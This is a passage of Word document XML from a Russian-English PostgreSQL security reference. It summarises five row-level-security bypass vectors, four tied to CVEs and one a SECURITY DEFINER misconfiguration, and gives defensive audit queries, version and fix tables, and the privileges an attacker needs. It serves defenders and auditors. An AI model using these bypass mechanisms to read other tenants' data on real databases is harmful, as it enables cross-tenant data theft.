          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND (r.rolsuper = true OR r.rolbypassrls = true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB6F1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_class` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: tables с RLS enabled но без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72410A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT n.nspname, c.relname, c.relrowsecurity, c.relforcerowsecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0335FB92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4900C8D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  JOIN pg_namespace n ON n.oid = c.relnamespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E258772" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WHERE c.relrowsecurity = true AND c.relforcerowsecurity = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9F8C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application audit</w:t>
      </w:r>
      <w:r>
        <w:t>: тестирование SD-функций под different tenant-roles, verifying что data isolation работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58E3E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t>: SECURITY DEFINER-функции с aggregations возвращают «too high» counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302AC119" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все версии PG с RLS (9.5+, 2016). FORCE ROW LEVEL SECURITY — с PG 9.5. BYPASSRLS attribute — с PG 9.5. Не CVE — pattern класс mis-configuration; не подлежит фикcу на уровне server-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733EA2D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F8F162" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.1 / 3.17.2 / 3.17.3 / 3.17.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-based RLS bypass; 3.17.5 — pattern без CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D512521" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — parallel pattern privilege escalation в SD-функциях. Граница: 3.13.6 — RCE через identifier hijack; 3.17.5 — data read через RLS bypass. Защита (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t>) общая.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A2560" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — третий класс уязвимостей в SD-функциях (identifier injection). Все три — components одного class «SECURITY DEFINER hygiene».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1948AB2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1 / 3.17.3 SET ROLE CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — related: oba about role-context interaction with RLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB5B8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — owner SD-функций должен быть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6153FC46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01F147" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Row Security Policies» (RLS bypass для owner, FORCE ROW LEVEL SECURITY) — https://www.postgresql.org/docs/current/ddl-rowsecurity.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92278E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «CREATE FUNCTION» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/sql-createfunction.html#SQL-CREATEFUNCTION-SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110448AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «CREATE ROLE» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BYPASSRLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/sql-createrole.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6509BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «ALTER TABLE» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/sql-altertable.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3358EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   2ndQuadrant blog: «Row Level Security and Security Definer Functions» — https://www.2ndquadrant.com/en/blog/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE737AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgexperts blog: «RLS Best Practices» — https://www.pgexperts.com/blog/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F5E2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wiki: «Security» / RLS guidance — https://wiki.postgresql.org/wiki/Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCFA6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари: категория 3.17 RLS-обходы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B802135" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Категория 3.17 покрывает обходы Row Level Security в PostgreSQL — пять механик, каждая из которых даёт атакующему чтение или запись строк, обходя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Четыре подраздела якорятся на CVE (R9 / R11 / R8 / R26), пятый — на documented PostgreSQL pattern без CVE (SECURITY DEFINER + RLS bypass для owner). Общий тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS — defence-in-depth, не sole authorization</w:t>
      </w:r>
      <w:r>
        <w:t>. Bug в reset path SET ROLE (3.17.1, 3.17.3), missed policy enforcement в MERGE (3.17.2), side-channel через optimizer statistics (3.17.4), или неосторожный SECURITY DEFINER (3.17.5) — любой из этих векторов даёт cross-tenant data leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D86C087" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Главный практический вывод: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upgrade на patched PG версии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для CVE-anchored — обязательно), плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`FORCE ROW LEVEL SECURITY`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на critical tables (для defence против 3.17.5 и unknown future CVE), плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>audit всех SECURITY DEFINER функций</w:t>
      </w:r>
      <w:r>
        <w:t>, читающих RLS-protected данные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594BF75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Подразделы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368198C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.1 Subquery + plan-cache (R9, CVE-2024-10976)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RLS-фильтр кэшируется в plan под одной ролью, исполняется под другой через subquery/CTE/SQL function paths. Уязвимо PG ≤ 17.0/16.4/15.8/14.13/13.16/12.20, фикс 14.11.2024. CVSS 4.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CE3F97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.2 MERGE RLS (R11, CVE-2023-39418)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — MERGE не применяет UPDATE/SELECT RLS policies в PG 15.0–15.3 (узкое окно). Фикс PG 15.4 (10.08.2023). CVSS 3.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A5A07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.3 SET ROLE reset (R8, CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — тот же CVE как 3.13.1, но фокус на data exfiltration (vs privilege escalation). Уязвимо PG ≤ 17.0/16.4/...12.20, фикс 14.11.2024. CVSS 4.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C6DAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.4 Optimizer stats (R26, CVE-2025-8713)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — custom operator bypass column ACL/RLS через optimizer statistics leak в planning phase. Уязвимо PG ≤ 17.5/16.9/15.13/14.18/13.21, фикс 14.08.2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D842FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.5 SECURITY DEFINER + RLS pattern</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — без CVE. SD-функция от superuser/owner получает RLS bypass; GRANT EXECUTE обычным tenants даёт cross-tenant aggregate/row leak. Защита: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + явный фильтр в SD-функции + SECURITY INVOKER default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EC624" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сводная таблица 5 векторов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996"/>
        <w:gridCol w:w="1085"/>
        <w:gridCol w:w="1271"/>
        <w:gridCol w:w="1263"/>
        <w:gridCol w:w="1241"/>
        <w:gridCol w:w="2452"/>
        <w:gridCol w:w="1305"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="1FE470AD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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045431F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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2D0C9C61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE</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7D8070F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS</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1593B1C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Затронуто (≤)</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E17E546" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</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55C3A14B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Дата фикса</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4D0FA58B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Min privilege атакующего</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C4EA387" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Связанная категория</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0B8CCE09"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C34F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.1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CAD360" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10976</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1BEE5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.2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93E2DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.0, 16.4, 15.8, 14.13, 13.16, 12.20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730EE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1, 16.5, 15.9, 14.14, 13.17, 12.21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0F8CDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024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9B9EB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tenant role + connection pool + subquery в SQL</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241D82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5C7EED3D"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C8DF86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.2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33F09F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-39418</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A2CE8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1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DA689D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>только 15.0–15.3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EC18C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.4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7EE6DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.08.2023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6B1642" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tenant role + MERGE-statement</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41AC61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7EA9F729"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601B80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.3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0BA4E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10978</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C26D4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.2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E87AC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.0, 16.4, 15.8, 14.13, 13.16, 12.20</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BA8FD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1, 16.5, 15.9, 14.14, 13.17, 12.21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2CEE63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024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C25083" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
